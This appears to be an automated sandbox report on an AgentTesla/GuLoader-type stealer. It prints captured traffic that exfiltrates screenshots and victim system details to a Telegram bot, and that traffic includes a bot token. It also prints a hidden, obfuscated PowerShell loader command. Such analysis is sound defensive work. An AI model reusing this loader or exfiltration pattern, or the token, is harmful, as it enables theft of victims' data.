                                                                2024-03-15 11:38:00 UTC16355OUTData Raw: 5c 8f 88 2f 20 be d7 bc cb 69 04 91 c7 00 42 eb c8 ce e2 7f ad 67 79 31 7f cf 24 ff 00 be 45 39 55 54 61 40 03 d0 56 94 b0 33 8d 45 29 49 59 19 d6 cd 68 3a 33 85 38 bb c9 5b 5b 0b 45 14 57 aa 7c f0 51 45 14 01 6b 4b 65 4d 52 d5 98 85 51 2a 92 49 c0 03 35 dc 7d ba cf fe 7e e0 ff 00 bf 8b fe 35 e7 b4 57 1d 7c 2f b6 97 35 ec 7a 18 5c 77 d5 e0 e1 cb 7d 7b 9e 85 f6 fb 2f f9 fc b7 ff 00 bf ab fe 34 9f 6f b2 ff 00 9f cb 7f fb fa bf e3 5e 7d 45 61 fd 9f fd ef c3 fe 09 d3 fd ab fd cf c7 fe 01 d4 f8 9e ea da 6d 35 12 1b 88 a4 6f 34 1c 23 82 71 83 e9 5c ad 14 57 66 1e 8f b1 8f 2d ee 70 62 b1 1f 58 9a 95 ad a0 51 45 15 b9 cc 14 51 45 00 14 51 45 00 14 94 b4 50 02 51 4b 49 40 05 14 51 40 05 14 51 40 05 14 51 40 09 45 14 50 30 a2 8a 29 80 94 52 d1 40 09 45 14 b4 00 94
                                                                Data Ascii: \/ iBgy1$E9UTa@V3E)IYh:38[[EW|QEkKeMRQ*I5}~5W|/5z\w}{/4o^}Eam5o4#q\Wf-pbXQEQEQEPQKI@Q@Q@Q@EP0)R@E
                                                                2024-03-15 11:38:00 UTC16355OUTData Raw: ac d2 ea 16 ca 38 cf 3d bd 41 af 38 d4 b5 49 6f a0 b5 b7 e5 61 b7 89 50 2f a9 00 02 69 fa 4e a2 d6 d1 cf 67 24 85 6d ae 54 ab 10 7e e1 c7 0d fe 3e d5 84 b0 4d c5 cb af e8 7a 51 c6 a5 25 1e 96 fc 4f 40 bd 39 ba d3 88 ff 00 9e e7 ff 00 45 49 5c b7 88 bf e4 35 3f d1 7f f4 11 52 78 7b 53 92 69 ec b4 db 8c 99 6d e6 6d a7 fd 91 1b 8c 7e 19 a8 fc 45 ff 00 21 a9 ff 00 e0 3f fa 08 a5 42 9b a7 59 45 f6 33 c6 54 55 30 ce 4b ba 33 28 a2 8a f5 0f 00 28 a2 8a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 25 14 b4 50 02 51 4b 45 00 25 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 09 45 2d 14 0c 4a 28 a2 98 09 45 2d 25 00 14 51 45 03 12 8a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 61 49 4b 49 40 05 25 3b b5 25 00 25 14 b4 94 0c 29 29 68 a0 04 a2 96 92 80 12 8a 5a
                                                                Data Ascii: 8=A8IoaP/iNg$mT~>MzQ%O@9EI\5?Rx{Simm~E!?BYE3TU0K3(((QEQE%PQKE%Q@Q@Q@Q@Q@E-J(E-%QEZ((((aIKI@%;%%))hZ
                                                                2024-03-15 11:38:00 UTC15447OUTData Raw: 06 db db 6e 3b d6 71 cc 30 d2 92 8a 96 af c9 ff 00 91 a4 b2 ec 4c 62 e4 e3 a2 f3 5f e6 65 d1 45 15 da 70 85 14 51 40 05 14 51 40 05 15 d5 db f8 7a c6 5b 68 a4 63 28 2e 81 8e 1b d4 7d 2a 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 6d 68 3a 65 be a1 1c c6 7d e0 a1 18 da 71 d7 35 9d 5a 8a 94 79 99 bd 0a 12 af 3e 48 ee 62 d1 5d 7f fc 23 76 1f de 9b fe fa 1f e1 49 ff 00 08 dd 87 f7 a6 ff 00 be 87 f8 57 2f d7 a9 f6 7f d7 cc ee fe ca ad dd 7e 3f e4 72 34 56 e5 fe 86 b1 a4 cd 68 59 8c 4d 82 ac 72 48 da 0f f5 ac 3e 95 d1 4a b4 6a ab c4 e3 c4 61
                                                                Data Ascii: n;q0Lb_eEpQ@Q@z[hc(.}*OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEmh:e}q5Zy>Hb]#vIW/~?r4VhYMrH>Jja
                                                                2024-03-15 11:38:00 UTC1603OUTData Raw: aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 09 ff 00 e3 de 4f f7 4f f2 af 9e 6b e8 39 a6 88 c1 20 12 21 25 4f f1 0f 4a f9 f2 ae 26 73 0a dc d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 ac 3a 2a 88 37 35 3f 12 4f 79 63 f6 0b 6b 58 2c 2c f3 b9 a1
                                                                Data Ascii: B$}<B$}<B$}<B$}<B$}<B$}<B$}<B$}<BOOk9 !%OJ&s<I=.m`r:*75?OyckX,,
                                                                2024-03-15 11:38:00 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 35 33 31 36 34 33 62 64 32 34 61 39 2d 2d 0d 0a
                                                                Data Ascii: -----------------------------8dc531643bd24a9--
                                                                2024-03-15 11:38:01 UTC1493INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0
                                                                Date: Fri, 15 Mar 2024 11:38:01 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 1104
                                                                Connection: close
                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                {"ok":true,"result":{"message_id":163,"from":{"id":6387496510,"is_bot":true,"first_name":"azhi2bot","username":"azhi2bot"},"chat":{"id":5585605185,"first_name":"HELP ME TRADE","username":"helpmetradeonline","type":"private"},"date":1710502681,"document":{"file_name":"user-302494 2024-04-02 13-10-27.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAA6Nl9DMZ26DxPVcuvn5-gRM985CrFwAC9BEAAucMoFPuTsTKe9vv7wEAB20AAzQE","file_unique_id":"AQAD9BEAAucMoFNy","file_size":12486,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAA6Nl9DMZ26DxPVcuvn5-gRM985CrFwAC9BEAAucMoFPuTsTKe9vv7wEAB20AAzQE","file_unique_id":"AQAD9BEAAucMoFNy","file_size":12486,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOjZfQzGdug8T1XLr5-foETPfOQqxcAAvQRAALnDKBT7k7Eynvb7-80BA","file_unique_id":"AgAD9BEAAucMoFM","file_size":66564},"caption":"New SC Recovered!\n\nTime: 04/02/2024 12:40:27\nUser Name: user/302494\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 191.96.227.194","caption_entities":[{"offset":179,"length":14,"type":"url"}]}}


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                6192.168.2.549722149.154.167.220443
                                                                TimestampBytes transferredDirectionData
                                                                2024-03-15 11:38:04 UTC238OUTPOST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=---------------------------8dc44ecc148ce97
                                                                Host: api.telegram.org
                                                                Content-Length: 67199
                                                                Expect: 100-continue
                                                                2024-03-15 11:38:04 UTC25INHTTP/1.1 100 Continue
                                                                2024-03-15 11:38:05 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 34 34 65 63 63 31 34 38 63 65 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 35 38 35 36 30 35 31 38 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 34 34 65 63 63 31 34 38 63 65 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 31 35 2f 32 30 32 34 20 31 32 3a 33 38 3a 30 32 0a 55 73 65 72
                                                                Data Ascii: -----------------------------8dc44ecc148ce97Content-Disposition: form-data; name="chat_id"5585605185-----------------------------8dc44ecc148ce97Content-Disposition: form-data; name="caption"New SC Recovered!Time: 03/15/2024 12:38:02User
                                                                2024-03-15 11:38:05 UTC16355OUTData Raw: 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c
                                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                2024-03-15 11:38:05 UTC16355OUTData Raw: 5c 8f 88 2f 20 be d7 bc cb 69 04 91 c7 00 42 eb c8 ce e2 7f ad 67 79 31 7f cf 24 ff 00 be 45 39 55 54 61 40 03 d0 56 94 b0 33 8d 45 29 49 59 19 d6 cd 68 3a 33 85 38 bb c9 5b 5b 0b 45 14 57 aa 7c f0 51 45 14 01 6b 4b 65 4d 52 d5 98 85 51 2a 92 49 c0 03 35 dc 7d ba cf fe 7e e0 ff 00 bf 8b fe 35 e7 b4 57 1d 7c 2f b6 97 35 ec 7a 18 5c 77 d5 e0 e1 cb 7d 7b 9e 85 f6 fb 2f f9 fc b7 ff 00 bf ab fe 34 9f 6f b2 ff 00 9f cb 7f fb fa bf e3 5e 7d 45 61 fd 9f fd ef c3 fe 09 d3 fd ab fd cf c7 fe 01 d4 f8 9e ea da 6d 35 12 1b 88 a4 6f 34 1c 23 82 71 83 e9 5c ad 14 57 66 1e 8f b1 8f 2d ee 70 62 b1 1f 58 9a 95 ad a0 51 45 15 b9 cc 14 51 45 00 14 51 45 00 14 94 b4 50 02 51 4b 49 40 05 14 51 40 05 14 51 40 05 14 51 40 09 45 14 50 30 a2 8a 29 80 94 52 d1 40 09 45 14 b4 00 94
                                                                Data Ascii: \/ iBgy1$E9UTa@V3E)IYh:38[[EW|QEkKeMRQ*I5}~5W|/5z\w}{/4o^}Eam5o4#q\Wf-pbXQEQEQEPQKI@Q@Q@Q@EP0)R@E
                                                                2024-03-15 11:38:05 UTC16355OUTData Raw: ac d2 ea 16 ca 38 cf 3d bd 41 af 38 d4 b5 49 6f a0 b5 b7 e5 61 b7 89 50 2f a9 00 02 69 fa 4e a2 d6 d1 cf 67 24 85 6d ae 54 ab 10 7e e1 c7 0d fe 3e d5 84 b0 4d c5 cb af e8 7a 51 c6 a5 25 1e 96 fc 4f 40 bd 39 ba d3 88 ff 00 9e e7 ff 00 45 49 5c b7 88 bf e4 35 3f d1 7f f4 11 52 78 7b 53 92 69 ec b4 db 8c 99 6d e6 6d a7 fd 91 1b 8c 7e 19 a8 fc 45 ff 00 21 a9 ff 00 e0 3f fa 08 a5 42 9b a7 59 45 f6 33 c6 54 55 30 ce 4b ba 33 28 a2 8a f5 0f 00 28 a2 8a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 25 14 b4 50 02 51 4b 45 00 25 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 09 45 2d 14 0c 4a 28 a2 98 09 45 2d 25 00 14 51 45 03 12 8a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 61 49 4b 49 40 05 25 3b b5 25 00 25 14 b4 94 0c 29 29 68 a0 04 a2 96 92 80 12 8a 5a
                                                                Data Ascii: 8=A8IoaP/iNg$mT~>MzQ%O@9EI\5?Rx{Simm~E!?BYE3TU0K3(((QEQE%PQKE%Q@Q@Q@Q@Q@E-J(E-%QEZ((((aIKI@%;%%))hZ
                                                                2024-03-15 11:38:05 UTC15447OUTData Raw: 06 db db 6e 3b d6 71 cc 30 d2 92 8a 96 af c9 ff 00 91 a4 b2 ec 4c 62 e4 e3 a2 f3 5f e6 65 d1 45 15 da 70 85 14 51 40 05 14 51 40 05 15 d5 db f8 7a c6 5b 68 a4 63 28 2e 81 8e 1b d4 7d 2a 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 6d 68 3a 65 be a1 1c c6 7d e0 a1 18 da 71 d7 35 9d 5a 8a 94 79 99 bd 0a 12 af 3e 48 ee 62 d1 5d 7f fc 23 76 1f de 9b fe fa 1f e1 49 ff 00 08 dd 87 f7 a6 ff 00 be 87 f8 57 2f d7 a9 f6 7f d7 cc ee fe ca ad dd 7e 3f e4 72 34 56 e5 fe 86 b1 a4 cd 68 59 8c 4d 82 ac 72 48 da 0f f5 ac 3e 95 d1 4a b4 6a ab c4 e3 c4 61
                                                                Data Ascii: n;q0Lb_eEpQ@Q@z[hc(.}*OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEmh:e}q5Zy>Hb]#vIW/~?r4VhYMrH>Jja
                                                                2024-03-15 11:38:05 UTC1613OUTData Raw: ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 04 ff 00 f1 ef 27 fb a7 f9 57 cf 35 f4 1c d3 44 60 90 09 10 92 a7 f8 87 a5 7c f9 57 13 39 85 6e 69 9e 24 9e ce c7 ec 17 36 b0 5f d9 e7 72 c3 70 b9 0a 7d 41 ed f8 56 1d 15 44 1b 9a 9f 89 27 bc b1 fb
                                                                Data Ascii: |??@QQT|??@QQT|??@QQT|??@QQT|??@QQT|??@QQT|??@QQT|??@QQT|??@'W5D`|W9ni$6_rp}AVD'
                                                                2024-03-15 11:38:05 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 34 34 65 63 63 31 34 38 63 65 39 37 2d 2d 0d 0a
                                                                Data Ascii: -----------------------------8dc44ecc148ce97--
                                                                2024-03-15 11:38:05 UTC1493INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0
                                                                Date: Fri, 15 Mar 2024 11:38:05 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 1104
                                                                Connection: close
                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                {"ok":true,"result":{"message_id":164,"from":{"id":6387496510,"is_bot":true,"first_name":"azhi2bot","username":"azhi2bot"},"chat":{"id":5585605185,"first_name":"HELP ME TRADE","username":"helpmetradeonline","type":"private"},"date":1710502685,"document":{"file_name":"user-302494 2024-03-15 12-38-02.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAA6Rl9DMdJXBTH1JY1D6AiVliaUb08AAC9REAAucMoFNerfxmJIFxGgEAB20AAzQE","file_unique_id":"AQAD9REAAucMoFNy","file_size":12491,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAA6Rl9DMdJXBTH1JY1D6AiVliaUb08AAC9REAAucMoFNerfxmJIFxGgEAB20AAzQE","file_unique_id":"AQAD9REAAucMoFNy","file_size":12491,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOkZfQzHSVwUx9SWNQ-gIlZYmlG9PAAAvURAALnDKBTXq38ZiSBcRo0BA","file_unique_id":"AgAD9REAAucMoFM","file_size":66574},"caption":"New SC Recovered!\n\nTime: 03/15/2024 12:38:02\nUser Name: user/302494\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 191.96.227.194","caption_entities":[{"offset":179,"length":14,"type":"url"}]}}


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:12:35:55
                                                                Start date:15/03/2024
                                                                Path:C:\Users\user\Desktop\Delivery details.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\Delivery details.exe
                                                                Imagebase:0x400000
                                                                File size:881'136 bytes
                                                                MD5 hash:78AC601A2F48BC5FC7C15EDB4C0FB9D7
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:12:35:56
                                                                Start date:15/03/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede)
                                                                Imagebase:0xc40000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:12:35:56
                                                                Start date:15/03/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:12:35:57
                                                                Start date:15/03/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\system32\cmd.exe" /c "set /A 1^^0
                                                                Imagebase:0x790000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:12:36:22
                                                                Start date:15/03/2024
                                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Program Files (x86)\windows mail\wab.exe
                                                                Imagebase:0x9c0000
                                                                File size:516'608 bytes
                                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3279914953.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3279914953.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3266183941.0000000004BC8000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:21.3%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:20.5%
                                                                  Total number of Nodes:1362
                                                                  Total number of Limit Nodes:33
                                                                  execution_graph 3273 401941 3274 401943 3273->3274 3275 402c37 17 API calls 3274->3275 3276 401948 3275->3276 3279 405abe 3276->3279 3318 405d89 3279->3318 3282 405ae6 DeleteFileW 3284 401951 3282->3284 3283 405afd 3289 405c1d 3283->3289 3332 4063b0 lstrcpynW 3283->3332 3286 405b23 3287 405b36 3286->3287 3288 405b29 lstrcatW 3286->3288 3333 405ccd lstrlenW 3287->3333 3290 405b3c 3288->3290 3289->3284 3350 4066f3 FindFirstFileW 3289->3350 3293 405b4c lstrcatW 3290->3293 3295 405b57 lstrlenW FindFirstFileW 3290->3295 3293->3295 3295->3289 3304 405b79 3295->3304 3296 405c46 3353 405c81 lstrlenW CharPrevW 3296->3353 3299 405c00 FindNextFileW 3302 405c16 FindClose 3299->3302 3299->3304 3300 405a76 5 API calls 3303 405c58 3300->3303 3302->3289 3305 405c72 3303->3305 3306 405c5c 3303->3306 3304->3299 3313 405bc1 3304->3313 3337 4063b0 lstrcpynW 3304->3337 3308 405414 24 API calls 3305->3308 3306->3284 3309 405414 24 API calls 3306->3309 3308->3284 3311 405c69 3309->3311 3310 405abe 60 API calls 3310->3313 3312 406176 36 API calls 3311->3312 3315 405c70 3312->3315 3313->3299 3313->3310 3314 405414 24 API calls 3313->3314 3316 405414 24 API calls 3313->3316 3338 405a76 3313->3338 3346 406176 MoveFileExW 3313->3346 3314->3299 3315->3284 3316->3313 3356 4063b0 lstrcpynW 3318->3356 3320 405d9a 3357 405d2c CharNextW CharNextW 3320->3357 3323 405ade 3323->3282 3323->3283 3324 406644 5 API calls 3330 405db0 3324->3330 3325 405de1 lstrlenW 3326 405dec 3325->3326 3325->3330 3328 405c81 3 API calls 3326->3328 3327 4066f3 2 API calls 3327->3330 3329 405df1 GetFileAttributesW 3328->3329 3329->3323 3330->3323 3330->3325 3330->3327 3331 405ccd 2 API calls 3330->3331 3331->3325 3332->3286 3334 405cdb 3333->3334 3335 405ce1 CharPrevW 3334->3335 3336 405ced 3334->3336 3335->3334 3335->3336 3336->3290 3337->3304 3363 405e7d GetFileAttributesW 3338->3363 3340 405aa3 3340->3313 3342 405a91 RemoveDirectoryW 3344 405a9f 3342->3344 3343 405a99 DeleteFileW 3343->3344 3344->3340 3345 405aaf SetFileAttributesW 3344->3345 3345->3340 3347 406197 3346->3347 3348 40618a 3346->3348 3347->3313 3366 405ffc 3348->3366 3351 405c42 3350->3351 3352 406709 FindClose 3350->3352 3351->3284 3351->3296 3352->3351 3354 405c4c 3353->3354 3355 405c9d lstrcatW 3353->3355 3354->3300 3355->3354 3356->3320 3358 405d49 3357->3358 3362 405d5b 3357->3362 3359 405d56 CharNextW 3358->3359 3358->3362 3360 405d7f 3359->3360 3360->3323 3360->3324 3361 405cae CharNextW 3361->3362 3362->3360 3362->3361 3364 405a82 3363->3364 3365 405e8f SetFileAttributesW 3363->3365 3364->3340 3364->3342 3364->3343 3365->3364 3367 406052 GetShortPathNameW 3366->3367 3368 40602c 3366->3368 3370 406171 3367->3370 3371 406067 3367->3371 3393 405ea2 GetFileAttributesW CreateFileW 3368->3393 3370->3347 3371->3370 3373 40606f wsprintfA 3371->3373 3372 406036 CloseHandle GetShortPathNameW 3372->3370 3374 40604a 3372->3374 3375 4063d2 17 API calls 3373->3375 3374->3367 3374->3370 3376 406097 3375->3376 3394 405ea2 GetFileAttributesW CreateFileW 3376->3394 3378 4060a4 3378->3370 3379 4060b3 GetFileSize GlobalAlloc 3378->3379 3380 4060d5 3379->3380 3381 40616a CloseHandle 3379->3381 3395 405f25 ReadFile 3380->3395 3381->3370 3386 4060f4 lstrcpyA 3389 406116 3386->3389 3387 406108 3388 405e07 4 API calls 3387->3388 3388->3389 3390 40614d SetFilePointer 3389->3390 3402 405f54 WriteFile 3390->3402 3393->3372 3394->3378 3396 405f43 3395->3396 3396->3381 3397 405e07 lstrlenA 3396->3397 3398 405e48 lstrlenA 3397->3398 3399 405e50 3398->3399 3400 405e21 lstrcmpiA 3398->3400 3399->3386 3399->3387 3400->3399 3401 405e3f CharNextA 3400->3401 3401->3398 3403 405f72 GlobalFree 3402->3403 3403->3381 3404 4015c1 3405 402c37 17 API calls 3404->3405 3406 4015c8 3405->3406 3407 405d2c 4 API calls 3406->3407 3417 4015d1 3407->3417 3408 401631 3410 401663 3408->3410 3411 401636 3408->3411 3409 405cae CharNextW 3409->3417 3414 401423 24 API calls 3410->3414 3424 401423 3411->3424 3421 40165b 3414->3421 3417->3408 3417->3409 3420 401617 GetFileAttributesW 3417->3420 3422 4015fa 3417->3422 3428 40597d 3417->3428 3436 405960 CreateDirectoryW 3417->3436 3419 40164a SetCurrentDirectoryW 3419->3421 3420->3417 3422->3417 3431 4058e3 CreateDirectoryW 3422->3431 3425 405414 24 API calls 3424->3425 3426 401431 3425->3426 3427 4063b0 lstrcpynW 3426->3427 3427->3419 3439 40678a GetModuleHandleA 3428->3439 3432 405930 3431->3432 3433 405934 GetLastError 3431->3433 3432->3422 3433->3432 3434 405943 SetFileSecurityW 3433->3434 3434->3432 3435 405959 GetLastError 3434->3435 3435->3432 3437 405974 GetLastError 3436->3437 3438 405970 3436->3438 3437->3438 3438->3417 3440 4067b0 GetProcAddress 3439->3440 3441 4067a6 3439->3441 3443 405984 3440->3443 3445 40671a GetSystemDirectoryW 3441->3445 3443->3417 3444 4067ac 3444->3440 3444->3443 3446 40673c wsprintfW LoadLibraryExW 3445->3446 3446->3444 3996 401e43 3997 402c15 17 API calls 3996->3997 3998 401e49 3997->3998 3999 402c15 17 API calls 3998->3999 4000 401e55 3999->4000 4001 401e61 ShowWindow 4000->4001 4002 401e6c EnableWindow 4000->4002 4003 402abf 4001->4003 4002->4003 4011 402644 4012 402c15 17 API calls 4011->4012 4013 402653 